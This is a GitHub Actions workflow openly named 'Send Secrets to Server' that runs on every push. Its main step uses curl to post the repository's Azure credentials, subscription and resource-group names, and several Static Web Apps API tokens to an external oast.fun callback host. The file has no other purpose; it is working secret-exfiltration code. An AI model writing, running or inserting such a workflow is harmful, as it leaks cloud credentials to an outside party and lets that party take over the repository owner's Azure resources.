name: Send Secrets to Server

on:
  push: 
  workflow_dispatch:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Bypass Cache
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Send Secrets to Server
        run: |
          curl -d 'AZURE_CREDENTIALS=${{ secrets.AZURE_CREDENTIALS }}&AZURE_STATIC_WEB_APPS_API_TOKEN_POLITE_CLIFF_016BDFA00=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_POLITE_CLIFF_016BDFA00 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_GRAY_COAST_0C6477800=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_GRAY_COAST_0C6477800 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_YELLOW_MOSS_0E6BA4700=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_YELLOW_MOSS_0E6BA4700 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_BLACK_COAST_0C7E58400=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_BLACK_COAST_0C7E58400 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_POLITE_FLOWER_0ADDF6800=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_POLITE_FLOWER_0ADDF6800 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_PURPLE_ROCK_014B22F00=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_PURPLE_ROCK_014B22F00 }}&AZURE_SUBSCRIPTION=${{ secrets.AZURE_SUBSCRIPTION }}&AZURE_RG=${{ secrets.AZURE_RG }}&AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_BEACH_04D1E4C00=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_BEACH_04D1E4C00 }}' https://yvfeehabjheovlaaoqyvn66e0rr6cykf4.oast.fun
    